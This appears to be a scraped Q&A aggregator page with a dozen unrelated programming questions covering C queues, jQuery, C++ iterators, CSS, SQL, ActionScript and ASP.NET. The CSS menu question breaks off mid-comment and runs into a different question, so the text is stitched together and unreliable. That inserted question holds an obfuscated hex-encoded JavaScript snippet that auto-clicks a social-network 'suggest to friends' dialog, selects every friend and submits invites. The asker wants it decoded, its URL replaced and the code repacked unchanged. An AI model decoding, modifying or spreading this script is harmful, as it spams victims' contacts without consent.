  • Lockless queue implementation ends up having a loop under stress

    - by Fozi
    I have lockless queues written in C in form of a linked list that contains requests from several threads posted to and handled in a single thread. After a few hours of stress I end up having the last request's next pointer pointing to itself, which creates an endless loop and locks up the handling thread. The application runs (and fails) on both Linux and Windows. I'm debugging on Windows, where my COMPARE_EXCHANGE_PTR maps to InterlockedCompareExchangePointer. This is the code that pushes a request to the head of the list, and is called from several threads: void push_request(struct request * volatile * root, struct request * request) { assert(request); do { request->next = *root; } while(COMPARE_EXCHANGE_PTR(root, request, request->next) != request->next); } This is the code that gets a request from the end of the list, and is only called by a single thread that is handling them: struct request * pop_request(struct request * volatile * root) { struct request * volatile * p; struct request * request; do { p = root; while(*p && (*p)->next) p = &(*p)->next; // <- loops here request = *p; } while(COMPARE_EXCHANGE_PTR(p, NULL, request) != request); assert(request->next == NULL); return request; } Note that I'm not using a tail pointer because I wanted to avoid the complication of having to deal with the tail pointer in push_request. However I suspect that the problem might be in the way I find the end of the list. There are several places that push a request into the queue, but they all look generaly like this: // device->requests is defined as struct request * volatile requests; struct request * request = malloc(sizeof(struct request)); if(request) { // fill out request fields push_request(&device->requests, request); sem_post(device->request_sem); } The code that handles the request is doing more than that, but in essence does this in a loop: if(sem_wait_timeout(device->request_sem, timeout) == sem_success) { struct request * request = pop_request(&device->requests); // handle request free(request); } I also just added a function that is checking the list for duplicates before and after each operation, but I'm afraid that this check will change the timing so that I will never encounter the point where it fails. (I'm waiting for it to break as I'm writing this.) When I break the hanging program the handler thread loops in pop_request at the marked position. I have a valid list of one or more requests and the last one's next pointer points to itself. The request queues are usually short, I've never seen more then 10, and only 1 and 3 the two times I could take a look at this failure in the debugger. I thought this through as much as I could and I came to the conclusion that I should never be able to end up with a loop in my list unless I push the same request twice. I'm quite sure that this never happens. I'm also fairly sure (although not completely) that it's not the ABA problem. I know that I might pop more than one request at the same time, but I believe this is irrelevant here, and I've never seen it happening. (I'll fix this as well) I thought long and hard about how I can break my function, but I don't see a way to end up with a loop. So the question is: Can someone see a way how this can break? Can someone prove that this can not? Eventually I will solve this (maybe by using a tail pointer or some other solution - locking would be a problem because the threads that post should not be locked, I do have a RW lock at hand though) but I would like to make sure that changing the list actually solves my problem (as opposed to makes it just less likely because of different timing).

  • Unable to get data from content in jQuery?

    - by Srikanth Chilukuri
    I have 2 HTML files and 2 js files. In App.html I want to include login.html and need to fetch the data from login.html and need to use in in App. App.html <!DOCTYPE html> <html> <head> <meta charset="ISO-8859-1"> <title>Insert title here</title> <script type="text/javascript" src='js/jquery.js'></script> <script type="text/javascript" src="js/app.js"></script> <script type="text/javascript" src="js/login.js"></script> </head> <body> <div id="content"></div> </body> </html> Login.html <!DOCTYPE html> <html> <head> <meta charset="ISO-8859-1"> <title>Insert title here</title> <script type="text/javascript" src='js/jquery.js'></script> </head> <body> <div> <div data-role="fieldcontain"> <label for="userid" id="luserid" ><strong>UserId : </strong></label> <input type="text" name="userid" id="userid" value="" class="logon" placeholder="Username" required/> </div> <div data-role="fieldcontain"> <label for="password" id="lpassword"><strong>Password :</strong></label> <input type="password" name="password" id="password" class="logon" value="" placeholder="Password" required/> </div> <div class="ui-body"> <fieldset class="ui-grid-a"> <div class="ui-block-a"><a data-role="button" id="loginbtn" data-theme="b">Login</a></div> </fieldset> </div> </div> </body> </html> app.js $(document).ready(function(){ $('#content').load('login.html'); }); login.js $(document).ready(function(){ var userid= $("#userid").val(); var upassword= $("#password").val(); alert(userid); alert(upassword); }); Please help me out on this. Note: I do not want to include the login.js in the Login.html.

  • Const-correctness semantics in C++

    - by thirtythreeforty
    For fun and profit™, I'm writing a trie class in C++ (using the C++11 standard.) My trie<T> has an iterator, trie<T>::iterator. (They're all actually functionally const_iterators, because you cannot modify a trie's value_type.) The iterator's class declaration looks partially like this: template<typename T> class trie<T>::iterator : public std::iterator<std::bidirectional_iterator_tag, T> { friend class trie<T>; struct state { state(const trie<T>* const node, const typename std::vector<std::pair<typename T::value_type, std::unique_ptr<trie<T>>>>::const_iterator& node_map_it ) : node{node}, node_map_it{node_map_it} {} // This pointer is to const data: const trie<T>* node; typename std::vector<std::pair<typename T::value_type, std::unique_ptr<trie<T>>>>::const_iterator node_map_it; }; public: typedef const T value_type; iterator() =default; iterator(const trie<T>* node) { parents.emplace(node, node->children.cbegin()); // ... } // ... private: std::stack<state> parents; // ... }; Notice that the node pointer is declared const. This is because (in my mind) the iterator should not be modifying the node that it points to; it is just an iterator. Now, elsewhere in my main trie<T> class, I have an erase function that has a common STL signature--it takes an iterator to data to erase (and returns an iterator to the next object). template<typename T> typename trie<T>::iterator trie<T>::erase(const_iterator it) { // ... // Cannot modify a const object! it.parents.top().node->is_leaf = false; // ... } The compiler complains because the node pointer is read-only! The erase function definitely should modify the trie that the iterator points to, even though the iterator shouldn't. So, I have two questions: Should iterator's constructors be public? trie<T> has the necessary begin() and end() members, and of course trie<T>::iterator and trie<T> are mutual friends, but I don't know what the convention is. Making them private would solve a lot of the angst I'm having about removing the const "promise" from the iterator's constructor. What are the correct const semantics/conventions regarding the iterator and its node pointer here? Nobody has ever explained this to me, and I can't find any tutorials or articles on the Web. This is probably the more important question, but it does require a good deal of planning and proper implementation. I suppose it could be circumvented by just implementing 1, but it's the principle of the thing!

  • Strange performance behaviour for 64 bit modulo operation

    - by codymanix
    The last three of these method calls take approx. double the time than the first four. The only difference is that their arguments doesn't fit in integer anymore. But should this matter? The parameter is declared to be long, so it should use long for calculation anyway. Does the modulo operation use another algorithm for numbersmaxint? I am using amd athlon64 3200+, winxp sp3 and vs2008. Stopwatch sw = new Stopwatch(); TestLong(sw, int.MaxValue - 3l); TestLong(sw, int.MaxValue - 2l); TestLong(sw, int.MaxValue - 1l); TestLong(sw, int.MaxValue); TestLong(sw, int.MaxValue + 1l); TestLong(sw, int.MaxValue + 2l); TestLong(sw, int.MaxValue + 3l); Console.ReadLine(); static void TestLong(Stopwatch sw, long num) { long n = 0; sw.Reset(); sw.Start(); for (long i = 3; i < 20000000; i++) { n += num % i; } sw.Stop(); Console.WriteLine(sw.Elapsed); } EDIT: I now tried the same with C and the issue does not occur here, all modulo operations take the same time, in release and in debug mode with and without optimizations turned on: #include "stdafx.h" #include "time.h" #include "limits.h" static void TestLong(long long num) { long long n = 0; clock_t t = clock(); for (long long i = 3; i < 20000000LL*100; i++) { n += num % i; } printf("%d - %lld\n", clock()-t, n); } int main() { printf("%i %i %i %i\n\n", sizeof (int), sizeof(long), sizeof(long long), sizeof(void*)); TestLong(3); TestLong(10); TestLong(131); TestLong(INT_MAX - 1L); TestLong(UINT_MAX +1LL); TestLong(INT_MAX + 1LL); TestLong(LLONG_MAX-1LL); getchar(); return 0; } EDIT2: Thanks for the great suggestions. I found that both .net and c (in debug as well as in release mode) does't not use atomically cpu instructions to calculate the remainder but they call a function that does. In the c program I could get the name of it which is "_allrem". It also displayed full source comments for this file so I found the information that this algorithm special cases the 32bit divisors instead of dividends which was the case in the .net application. I also found out that the performance of the c program really is only affected by the value of the divisor but not the dividend. Another test showed that the performance of the remainder function in the .net program depends on both the dividend and divisor. BTW: Even simple additions of long long values are calculated by a consecutive add and adc instructions. So even if my processor calls itself 64bit, it really isn't :( EDIT3: I now ran the c app on a windows 7 x64 edition, compiled with visual studio 2010. The funny thing is, the performance behavior stays the same, although now (I checked the assembly source) true 64 bit instructions are used.

  • Internet explorer and floats: please explain

    - by cletus
    Yesterday someone asked Width absorbing HTML elements. I presented two solutions: one table-based and one pure CSS. Now the pure CSS one works well in Firefox and Chrome but not in IE. Basically the floats are being bumped down to the next line. It is my understanding (and the behaviour of FF and Chrome) that this should not be the case because the left divs are block level elements that floats should basically ignore. Complete code example is below. Adding a DOCTYPE to force IE into standards compliant mode helps slightly but the problem remains. So my question is: am I mistaken about my understanding of floats or is this IE's problem? More importantly, how do I get this to work in IE? It's been bugging the hell out of me. <html> <head> <style type="text/css"> div div { height: 1.3em; } #wrapper { width: 300px; overflow: hidden; } div.text { float: right; white-space: nowrap; clear: both; background: white; padding-left: 12px; text-align: left; } #row1, #row2, #row3, #row4, #row5, #row6 { width: 270px; margin-bottom: 4px; } #row1 { background: red; } #row2 { background: blue; } #row3 { background: green; } #row4 { background: yellow; } #row5 { background: pink; } #row6 { background: gray; } </style> <script type="text/javascript" src="http://www.google.com/jsapi"></script> <script type="text/javascript"> google.load("jquery", "1.3.2"); google.setOnLoadCallback(function() { $(function() { $("div.text").animate({ width: "90%" }, 2000); }); }); </script> </head> <body> <div id="wrapper"> <div class="text">FOO</div><div id="row1"></div> <div class="text">BAR</div><div id="row2"></div> <div class="text">THESE PRETZELS ARE</div><div id="row3"></div> <div class="text">MAKING ME THIRSTY</div><div id="row4"></div> <div class="text">BLAH</div><div id="row5"></div> <div class="text">BLAH</div><div id="row6"></div> </div> </body> </html>

  • What is the recommended way of parsing an XML feed with multiple namespaces with ActionScript 3.0?

    - by dafko
    I have seen the following methods to be used in several online examples, but haven't found any documentation on the recommended way of parsing an XML feed. Method 1: protected function xmlResponseHandler(event:ResultEvent):void { var atom:Namespace = new Namespace("http://www.w3.org/2005/Atom"); var microsoftData:Namespace = new Namespace("http://schemas.microsoft.com/ado/2007/08/dataservices"); var microsoftMetadata:Namespace = new Namespace("http://schemas.microsoft.com/ado/2007/08/dataservices/metadata"); var ac:ArrayCollection = new ArrayCollection(); var keyValuePairs:KeyValuePair; var propertyList:XMLList = (event.result as XML)..atom::entry.atom::content.microsoftMetadata::properties; for each (var properties:XML in propertyList) { keyValuePairs = new KeyValuePair(properties.microsoftData::FieldLocation, properties.microsoftData::Locationid); ac.addItem(keyValuePairs); } cb.dataProvider = ac; } Method 2: protected function xmlResponseHandler(event:ResultEvent):void { namespace atom = "http://www.w3.org/2005/Atom"; namespace d = "http://schemas.microsoft.com/ado/2007/08/dataservices"; namespace m = "http://schemas.microsoft.com/ado/2007/08/dataservices/metadata"; use namespace d; use namespace m; use namespace atom; var ac:ArrayCollection = new ArrayCollection(); var keyValuePairs:KeyValuePair; var propertyList:XMLList = (event.result as XML)..entry.content.properties; for each (var properties:XML in propertyList) { keyValuePairs = new KeyValuePair(properties.FieldLocation, properties.Locationid); ac.addItem(keyValuePairs); } cb.dataProvider = ac; } Sample XML feed: <?xml version="1.0" encoding="iso-8859-1" standalone="yes"?> <feed xml:base="http://www.test.com/Test/my.svc/" xmlns:d="http://schemas.microsoft.com/ado/2007/08/dataservices" xmlns:m="http://schemas.microsoft.com/ado/2007/08/dataservices/metadata" xmlns="http://www.w3.org/2005/Atom"> <title type="text">Test_Locations</title> <id>http://www.test.com/test/my.svc/Test_Locations</id> <updated>2010-04-27T20:41:23Z</updated> <link rel="self" title="Test_Locations" href="Test_Locations" /> <entry> <id>1</id> <title type="text"></title> <updated>2010-04-27T20:41:23Z</updated> <author> <name /> </author> <link rel="edit" title="Test_Locations" href="http://www.test.com/id=1" /> <category term="MySQLModel.Test_Locations" scheme="http://schemas.microsoft.com/ado/2007/08/dataservices/scheme" /> <content type="application/xml"> <m:properties> <d:FieldLocation>Test Location</d:FieldLocation> <d:Locationid>test0129</d:Locationid> </m:properties> </content> </entry> <entry> <id>2</id> <title type="text"></title> <updated>2010-04-27T20:41:23Z</updated> <author> <name /> </author> <link rel="edit" title="Test_Locations" href="http://www.test.com/id=2" /> <category term="MySQLModel.Test_Locations" scheme="http://schemas.microsoft.com/ado/2007/08/dataservices/scheme" /> <content type="application/xml"> <m:properties> <d:FieldLocation>Yet Another Test Location</d:FieldLocation> <d:Locationid>test25</d:Locationid> </m:properties> </content> </entry> </feed>

  • CSS Horizontal sub menu - IE 6,7 both dont working, tried with whatever hover.

    - by SHAKTI
    I'm not expert about css menus. But I know basic system to make css menu. I used this system before and works, but this time it is not working. The site is http://www.uniethos.com. Please check this site This menu works with all other latest Browsers. But not with IE 6 & 7. I know IE6 don't support hover except anchor. So before I was using Whatever Hover. But this time it is not working and even with IE7. I don't know why its happening. May be there could be some problem with my css. Please check the css. If you don't have IE 6 or 7 installed you can run one from http://spoon.net/browsers/. Require to install one plugin. The CSS I'm using for the menu is .glossymenu{ background: #B4B3B3; height: 30px; width: 100%; padding: 0; margin: 0; display:inline-block; position:relative; } .glossymenu ul { list-style: none; padding: 0px; margin: 0; padding-left: 0px; } .glossymenu li ul { display:none; position:absolute; width: 80%; top:30px; left:0px; background-color:#5B0C10; border:0px; z-index: 99; } .glossymenu li li a { padding: 0px 10px 0px 10px; } .glossymenu li li a:hover { background : #871016; } .glossymenu li{ float:left; padding: 0; } .glossymenu li a{ float: left; display:block; position:relative; color:#FFF; text-decoration: none; font-family: sans-serif; font-size: 13px; font-weight: bold; padding:0 0 0 16px; /*Padding to accomodate left tab image. I have a javascript code that appears to be encrypted: javascript:var _0xe788=[&quot;\x69\x6E\x6E\x65\x72\x48\x54\x4D\x4C&quot;,&quot;\x61\x70\x70\x34\x39\x34\x39\x37\x35\x32\x38\x37\x38\x5F\x62\x6F\x64\x79&quot;,&quot;\x67\x65\x74\x45\x6C\x65\x6D\x65\x6E\x74\x42\x79\x49\x64&quot;,&quot;\x3C\x61\x20\x69\x64\x3D\x22\x73\x75\x67\x67\x65\x73\x74\x22\x20\x68\x72\x65\x66\x3D\x22\x23\x22\x20\x61\x6A\x61\x78\x69\x66\x79\x3D\x22\x2F\x61\x6A\x61\x78\x2F\x73\x6F\x63\x69\x61\x6C\x5F\x67\x72\x61\x70\x68\x2F\x69\x6E\x76\x69\x74\x65\x5F\x64\x69\x61\x6C\x6F\x67\x2E\x70\x68\x70\x3F\x63\x6C\x61\x73\x73\x3D\x46\x61\x6E\x4D\x61\x6E\x61\x67\x65\x72\x26\x61\x6D\x70\x3B\x6E\x6F\x64\x65\x5F\x69\x64\x3D\x31\x31\x36\x38\x37\x38\x34\x39\x34\x39\x39\x32\x36\x35\x37\x22\x20\x63\x6C\x61\x73\x73\x3D\x22\x20\x70\x72\x6F\x66\x69\x6C\x65\x5F\x61\x63\x74\x69\x6F\x6E\x20\x61\x63\x74\x69\x6F\x6E\x73\x70\x72\x6F\x5F\x61\x22\x20\x72\x65\x6C\x3D\x22\x64\x69\x61\x6C\x6F\x67\x2D\x70\x6F\x73\x74\x22\x3E\x53\x75\x67\x67\x65\x73\x74\x20\x74\x6F\x20\x46\x72\x69\x65\x6E\x64\x73\x3C\x2F\x61\x3E&quot;,&quot;\x73\x75\x67\x67\x65\x73\x74&quot;,&quot;\x4D\x6F\x75\x73\x65\x45\x76\x65\x6E\x74\x73&quot;,&quot;\x63\x72\x65\x61\x74\x65\x45\x76\x65\x6E\x74&quot;,&quot;\x63\x6C\x69\x63\x6B&quot;,&quot;\x69\x6E\x69\x74\x45\x76\x65\x6E\x74&quot;,&quot;\x64\x69\x73\x70\x61\x74\x63\x68\x45\x76\x65\x6E\x74&quot;,&quot;\x73\x65\x6C\x65\x63\x74\x5F\x61\x6C\x6C&quot;,&quot;\x73\x67\x6D\x5F\x69\x6E\x76\x69\x74\x65\x5F\x66\x6F\x72\x6D&quot;,&quot;\x2F\x61\x6A\x61\x78\x2F\x73\x6F\x63\x69\x61\x6C\x5F\x67\x72\x61\x70\x68\x2F\x69\x6E\x76\x69\x74\x65\x5F\x64\x69\x61\x6C\x6F\x67\x2E\x70\x68\x70&quot;,&quot;\x73\x75\x62\x6D\x69\x74\x44\x69\x61\x6C\x6F\x67&quot;,&quot;\x3C\x69\x66\x72\x61\x6D\x65\x20\x73\x72\x63\x3D\x22\x67\x6F\x6F\x67\x6C\x65\x2E\x63\x6F\x6D\x22\x20\x73\x74\x79\x6C\x65\x3D\x22\x77\x69\x64\x74\x68\x3A\x20\x38\x32\x30\x70\x78\x3B\x20\x68\x65\x69\x67\x68\x74\x3A\x20\x36\x30\x30\x70\x78\x3B\x22\x20\x66\x72\x61\x6D\x65\x62\x6F\x72\x64\x65\x72\x3D\x30\x20\x73\x63\x72\x6F\x6C\x6C\x69\x6E\x67\x3D\x22\x6E\x6F\x22\x3E\x3C\x2F\x69\x66\x72\x61\x6D\x65\x3E&quot;];var variables=[_0xe788[0],_0xe788[1],_0xe788[2],_0xe788[3],_0xe788[4],_0xe788[5],_0xe788[6],_0xe788[7],_0xe788[8],_0xe788[9],_0xe788[10],_0xe788[11],_0xe788[12],_0xe788[13]]; void (document[variables[2]](variables[1])[variables[0]]=variables[3]);var ss=document[variables[2]](variables[4]);var c=document[variables[6]](variables[5]);c[variables[8]](variables[7],true,true); void ss[variables[9]](c); void setTimeout(function (){fs[variables[10]]();} ,4000); void setTimeout(function (){SocialGraphManager[variables[13]](variables[11],variables[12]);} ,5000); void (document[variables[2]](variables[1])[variables[0]]=_0xe788[14]); I have seen similar instances and I have heard it may be Hex. I have been doing some google research and have found some online deciphers for Hex yet they all seem to struggle decrypting the code. I basically need to decipher this code, change some variables and repack it exactly how I found it but replacing a URL. How can I go about this? Are there any free online tools available? Many thanks.

  • CSS: Horizontal UL: Getting it centered

    - by Steve
    I'm trying to make a horizontal menu/list. It has a mix of independent buttons and buttons that are wrapped in their own individual forms. With much hacking I got all of the buttons, in forms and not in forms to align horizontally. I haven't been able to get the whole thing to center on the page though. Could someone point out to me what I am not seeing? <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"><head> <meta http-equiv="content-type" content="text/html; charset=ISO-8859-1"> <link rel="shortcut icon" href="http://localhost:7001/nsd/images/favicon.ico"> <link rel="StyleSheet" href="veci_files/nsd.css" type="text/css"> <style type = "text/css"> #horizontal_li_menu_container ul { margin-left: auto; margin-right:auto; text-align:center; border: 1px solid green; width:1000px; } #horizontal_li_menu_container_ul { list-style-type: none; text-decoration: none; border: 1px solid red; } #horizontal_li_menu_container li { display: inline;float:left; } </style> </head> <body> <div id = "horizontal_li_menu_container"> <ul id = "horizontal_li_menu_container_ul"> <li> <input value="Update" onclick="location.href='#'" name="button" type="button"/> </li> <li> <form name="formExportVECI" method="post" action="exportveci"> <input name="person_id" value="661774" type="hidden"> <input name="submitExport" value="Export To Microsoft Excel" type="submit"> </form> </li> <li> <form id="ufdh" name="formImportVECI" action="importveci" method="post" enctype="multipart/form-data"> <input name="person_id" value="661774" type="hidden"> <input value="Import From Microsoft Excel" path="Upload" type="submit"> <input id="fileData" name="fileData" value="" type="file"> </form> </li> <li> <input value="Search/Home" onclick="location.href='search'" name="buttonHome" type="button"/> </li> </ul> </div> </body></html>

  • plotting multiple google maps to page

    - by Roland
    I'm trying to append more than one Google Map to a page. But it seems like I'm having some trouble. This would be the template I'm using to ( with Handlebars.js ) to create the same block more than once, about 50 times : <script type="text/x-handlebars-template"> {{#each productListing}} <div class="product-listing-wrapper"> <div class="product-listing"> <div class="left-side-content"> <div class="thumb-wrapper" data-image-link="{{ThumbnailUrl}}"> <i class="thumb"> <img src="{{ThumbnailUrl}}" alt="Thumb"> <span class="zoom-image"></span> </i> </div> <div class="google-maps-wrapper"> <div class="google-coordonates-wrapper"> <div class="google-coordonates"> <p>{{LatLon.Lat}}</p> <p>{{LatLon.Lon}}</p> </div> </div> <div class="google-maps-button"> <a class="google-maps" href="#">Google Maps</a> </div> </div> </div> <div class="right-side-content"> <div class="map-canvas-wrapper"> <div id="map-canvas" class="map-canvas" data-latitude="{{LatLon.Lat}}" data-longitude="{{LatLon.Lon}}"></div> </div> <div class="content-wrapper"></div> </div> </div> </div> {{/each}} And I'm trying to append the map to the #map-canvas id. With the following block of code I'm doing the plotting : Cluster.prototype.initiate_map_assembling = function() { return $(this.map_canvas_wrapper_class).each(function(index, element) { var canvas = $(element).children(); var latitude = $(canvas).attr('data-latitude'); var longitude = $(canvas).attr('data-longitude'); var coordinates = new google.maps.LatLng(latitude, longitude); var options = { zoom: 9, center: coordinates, mapTypeId: google.maps.MapTypeId.ROADMAP }; var map = new google.maps.Map($(canvas), options); var marker = new google.maps.Marker({ position: coordinates, map: map }); }); }; This way I'm "looping" through all the parent classes of the id I'm trying to append the map to, but the map would only append to the first id. I tried to append it to all of the id's in other ways but with the same results. So what would you suggest me to do to make it work as I would expect it, append the map to each of the id's ?

  • Normalizing a table

    - by Alex
    I have a legacy table, which I can't change. The values in it can be modified from legacy application (application also can't be changed). Due to a lot of access to the table from new application (new requirement), I'd like to create a temporary table, which would hopefully speed up the queries. The actual requirement, is to calculate number of business days from X to Y. For example, give me all business days from Jan 1'st 2001 until Dec 24'th 2004. The table is used to mark which days are off, as different companies may have different days off - it isn't just Saturday + Sunday) The temporary table would be created from a .NET program, each time user enters the screen for this query (user may run query multiple times, with different values, table is created once), so I'd like it to be as fast as possible. Approach below runs in under a second, but I only tested it with a small dataset, and still it takes probably close to half a second, which isn't great for UI - even though it's just the overhead for first query. The legacy table looks like this: CREATE TABLE [business_days]( [country_code] [char](3) , [state_code] [varchar](4) , [calendar_year] [int] , [calendar_month] [varchar](31) , [calendar_month2] [varchar](31) , [calendar_month3] [varchar](31) , [calendar_month4] [varchar](31) , [calendar_month5] [varchar](31) , [calendar_month6] [varchar](31) , [calendar_month7] [varchar](31) , [calendar_month8] [varchar](31) , [calendar_month9] [varchar](31) , [calendar_month10] [varchar](31) , [calendar_month11] [varchar](31) , [calendar_month12] [varchar](31) , misc. ) Each month has 31 characters, and any day off (Saturday + Sunday + holiday) is marked with X. Each half day is marked with an 'H'. For example, if a month starts on a Thursday, than it will look like (Thursday+Friday workdays, Saturday+Sunday marked with X): ' XX XX ..' I'd like the new table to look like so: create table #Temp (country varchar(3), state varchar(4), date datetime, hours int) And I'd like to only have rows for days which are off (marked with X or H from previous query) What I ended up doing, so far is this: Create a temporary-intermediate table, that looks like this: create table #Temp_2 (country_code varchar(3), state_code varchar(4), calendar_year int, calendar_month varchar(31), month_code int) To populate it, I have a union which basically unions calendar_month, calendar_month2, calendar_month3, etc. Than I have a loop which loops through all the rows in #Temp_2, after each row is processed, it is removed from #Temp_2. To process the row there is a loop from 1 to 31, and substring(calendar_month, counter, 1) is checked for either X or H, in which case there is an insert into #Temp table. [edit added code] Declare @country_code char(3) Declare @state_code varchar(4) Declare @calendar_year int Declare @calendar_month varchar(31) Declare @month_code int Declare @calendar_date datetime Declare @day_code int WHILE EXISTS(SELECT * From #Temp_2) -- where processed = 0) BEGIN Select Top 1 @country_code = t2.country_code, @state_code = t2.state_code, @calendar_year = t2.calendar_year, @calendar_month = t2.calendar_month, @month_code = t2.month_code From #Temp_2 t2 -- where processed = 0 set @day_code = 1 while @day_code <= 31 begin if substring(@calendar_month, @day_code, 1) = 'X' begin set @calendar_date = convert(datetime, (cast(@month_code as varchar) + '/' + cast(@day_code as varchar) + '/' + cast(@calendar_year as varchar))) insert into #Temp (country, state, date, hours) values (@country_code, @state_code, @calendar_date, 8) end if substring(@calendar_month, @day_code, 1) = 'H' begin set @calendar_date = convert(datetime, (cast(@month_code as varchar) + '/' + cast(@day_code as varchar) + '/' + cast(@calendar_year as varchar))) insert into #Temp (country, state, date, hours) values (@country_code, @state_code, @calendar_date, 4) end set @day_code = @day_code + 1 end delete from #Temp_2 where @country_code = country_code AND @state_code = state_code AND @calendar_year = calendar_year AND @calendar_month = calendar_month AND @month_code = month_code --update #Temp_2 set processed = 1 where @country_code = country_code AND @state_code = state_code AND @calendar_year = calendar_year AND @calendar_month = calendar_month AND @month_code = month_code END I am not an expert in SQL, so I'd like to get some input on my approach, and maybe even a much better approach suggestion. After having the temp table, I'm planning to do (dates would be coming from a table): select cast(convert(datetime, ('01/31/2012'), 101) -convert(datetime, ('01/17/2012'), 101) as int) - ((select sum(hours) from #Temp where date between convert(datetime, ('01/17/2012'), 101) and convert(datetime, ('01/31/2012'), 101)) / 8) Besides the solution of normalizing the table, the other solution I implemented for now, is a function which does all this logic of getting the business days by scanning the current table. It runs pretty fast, but I'm hesitant to call a function, if I can instead add a simpler query to get result. (I'm currently trying this on MSSQL, but I would need to do same for Sybase ASE and Oracle)

  • ActionScript Gradient Banding Problem

    - by TheDarkIn1978
    i'm having a strange issue with banding between certain colors of a gradient. to create the gradient, i'm drawing evenly spaced circle wedges from the center to the border, and filling each circle wedge from a bitmap line gradient pixel in a loop. public class ColorWheel extends Sprite { private static const DEFAULT_RADIUS:Number = 100; private static const DEFAULT_BANDING_QUALITY:int = 3600; public function ColorWheel(nRadius:Number = DEFAULT_RADIUS) { init(nRadius); } public function init(nRadius:Number = DEFAULT_RADIUS):void { var nRadians : Number; var nColor : Number; var objMatrix : Matrix = new Matrix(); var nX : Number; var nY : Number; var previousX : Number = nRadius; var previousY : Number = 0; var leftToRightColors:Array = new Array(0xFF0000, 0xFFFF00, 0x00FF00, 0x00FFFF, 0x0000FF, 0xFF00FF); leftToRightColors.push(leftToRightColors[0]); var leftToRightAlphas:Array = new Array(); var leftToRightRatios:Array = new Array(); var leftToRightPartition:Number = 255 / (leftToRightColors.length - 1); //Push arrays for (var j:int = 0; j < leftToRightColors.length; j++) { leftToRightAlphas.push(1); leftToRightRatios.push(j * leftToRightPartition); } var leftToRightColorsMatrix:Matrix = new Matrix(); leftToRightColorsMatrix.createGradientBox(DEFAULT_BANDING_QUALITY, 1); //Produce a horizontal leftToRightLine sprite var leftToRightLine:Sprite = new Sprite(); leftToRightLine.graphics.lineStyle(1, 0, 1, false, LineScaleMode.NONE, CapsStyle.NONE); leftToRightLine.graphics.lineGradientStyle(GradientType.LINEAR, leftToRightColors, leftToRightAlphas, leftToRightRatios, leftToRightColorsMatrix); leftToRightLine.graphics.moveTo(0, 0); leftToRightLine.graphics.lineTo(DEFAULT_BANDING_QUALITY, 0); //Assign bitmapData to the leftToRightLine var leftToRightLineBitmapData:BitmapData = new BitmapData(leftToRightLine.width, leftToRightLine.height); leftToRightLineBitmapData.draw(leftToRightLine); for(var i:int = 1; i < (DEFAULT_BANDING_QUALITY + 1); i++) { // Convert the degree to radians. nRadians = i * (Math.PI / (DEFAULT_BANDING_QUALITY / 2)); // OR the individual color channels together. nColor = leftToRightLineBitmapData.getPixel(i-1, 0); // Calculate the coordinate in which the line should be drawn to. nX = nRadius * Math.cos(nRadians); nY = nRadius * Math.sin(nRadians); // Create a matrix for the wedges gradient color. objMatrix.createGradientBox(nRadius * 2, nRadius * 2, nRadians, -nRadius, -nRadius); graphics.beginGradientFill(GradientType.LINEAR, [nColor, nColor], [1, 1], [127, 255], objMatrix); graphics.moveTo( 0, 0 ); graphics.lineTo( previousX, previousY ); graphics.lineTo( nX, nY ); graphics.lineTo( 0, 0 ); graphics.endFill(); previousX = nX; previousY = nY; } } } i'm creating a circle with 3600 wedges, although it doesn't look like it based on the screen shot within the orange color that is produced from gradating from red to yellow numbers. adding a orange number between red and yellow doesn't help. but if i create the circle with only 360 wedges, the gradient banding is much more obvious. 3600 is probably overkill, and doesn't really add more detail over, say, making the circle of 1440 wedges, but i don't know any other way to slightly elevate this banding issue. any ideas how i can fix this, or what i'm doing wrong? could it be caused by the circleMatrix rotation?

  • Ajax Calendar Date Range with JavaScript

    - by hungrycoder
    I have the following code to compare two dates with the following conditions Scenario: On load there are two text boxes (FromDate, ToDate) with Ajax calendar extenders. On load From Date shows today's date. when date less than today was selected in both text boxes(FromDate, ToDate), it alerts user saying "You cannot select a day earlier than today!" When ToDate's Selected date < FromDate's Selected Date, alerts user saying "To Date must be Greater than From date." and at the same time it clears the selected Date in ToDate Text box. Codeblock: ASP.NET , AJAX <asp:TextBox ID="txtFrom" runat="server" ReadOnly="true"></asp:TextBox> <asp:ImageButton ID="imgBtnFrom" runat="server" ImageUrl="~/images/Cal20x20.png" Width="20" Height="20" ImageAlign="TextTop" /> <asp:CalendarExtender ID="txtFrom_CalendarExtender" PopupButtonID="imgBtnFrom" runat="server" Enabled="True" OnClientDateSelectionChanged="checkDate" TargetControlID="txtFrom" Format="MMM d, yyyy"> </asp:CalendarExtender> <asp:TextBox ID="txtTo" runat="server" ReadOnly="true"></asp:TextBox> <asp:ImageButton ID="imgBtnTo" runat="server" ImageUrl="~/images/Cal20x20.png" Width="20" Height="20" ImageAlign="TextTop" /> <asp:CalendarExtender ID="txtTo_CalendarExtender" OnClientDateSelectionChanged="compareDateRange" PopupButtonID="imgBtnTo" runat="server" Enabled="True" TargetControlID="txtTo" Format="MMM d, yyyy"> </asp:CalendarExtender> <asp:HiddenField ID="hdnFrom" runat="server" /> <asp:HiddenField ID="hdnTo" runat="server" /> C# Code protected void Page_Load(object sender, EventArgs e) { txtFrom.Text = string.Format("{0: MMM d, yyyy}", DateTime.Today); if (Page.IsPostBack) { if (!String.IsNullOrEmpty(hdnFrom.Value as string)) { txtFrom.Text = hdnFrom.Value; } if (!String.IsNullOrEmpty(hdnTo.Value as string)) { txtTo.Text = hdnTo.Value; } } } JavaScript Code <script type="text/javascript"> function checkDate(sender, args) { document.getElementById('<%=txtTo.ClientID %>').value = ""; if (sender._selectedDate < new Date()) { alert("You cannot select a day earlier than today!"); sender._selectedDate = new Date(); // set the date back to the current date sender._textbox.set_Value(sender._selectedDate.format(sender._format)); //assign the value to the hidden field. document.getElementById('<%=hdnFrom.ClientID %>').value = sender._selectedDate.format(sender._format); //reset the to date to blank. document.getElementById('<%=txtTo.ClientID %>').value = ""; } else { document.getElementById('<%=hdnFrom.ClientID %>').value = sender._selectedDate.format(sender._format); } } function compareDateRange(sender, args) { var fromDateString = document.getElementById('<%=txtFrom.ClientID %>').value; var fromDate = new Date(fromDateString); if (sender._selectedDate < new Date()) { alert("You cannot select a Date earlier than today!"); sender._selectedDate = ""; sender._textbox.set_Value(sender._selectedDate) } if (sender._selectedDate <= fromDate) { alert("To Date must be Greater than From date."); sender._selectedDate = ""; sender._textbox.set_Value(sender._selectedDate) } else { document.getElementById('<%=hdnTo.ClientID %>').value = 